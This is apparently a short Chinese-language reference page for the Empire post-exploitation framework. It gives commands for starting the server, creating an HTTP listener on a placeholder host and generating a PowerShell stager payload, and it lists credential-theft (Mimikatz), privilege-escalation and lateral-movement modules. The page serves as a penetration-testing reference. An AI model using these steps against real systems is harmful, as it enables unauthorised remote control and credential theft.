---
title: "Empire"
weight: 70
description: "PowerShell/Python 后渗透框架"
date: "2026-03-24T16:29:46+08:00"
lastmod: "2026-03-24T16:29:46+08:00"
---

## Empire

Empire 是一款基于 PowerShell 和 Python 的后渗透框架，提供强大的后渗透攻击能力。

## 基础使用

### 启动 Empire
```bash
./empire --server
./empire --client
```

### 创建 Listener
```bash
uselistener http
set Name http_listener
set Host http://x.x.x.x
execute
```

### 生成 Stager
```bash
usestager powershell/multi
set Listener http_listener
set OutFile payload.ps1
generate
```

### 模块使用
```bash
usemodule situational_awareness/network/powerview
execute
```

## 功能特性

- **PowerShell 核心** - 基于 PowerShell 的后渗透
- **模块化设计** - 丰富的功能模块
- **多种 Listener** - HTTP、HTTPS、DNS 等
- **Python 支持** - 跨平台 Python Agent

## 主要模块

- **权限提升** - 本地提权模块
- **凭证窃取** - Mimikatz 集成
- **网络侦察** - 域环境侦察
- **横向移动** - 内网渗透

## 技术特点

- 基于 PowerShell 和 Python
- 支持多种传输协议
- 内置混淆功能
- 丰富的后渗透模块

## 参考资源

- [Empire 文档](https://www.bc-security.org/empire-docs/)
- [Empire GitHub](https://github.com/BC-SECURITY/Empire)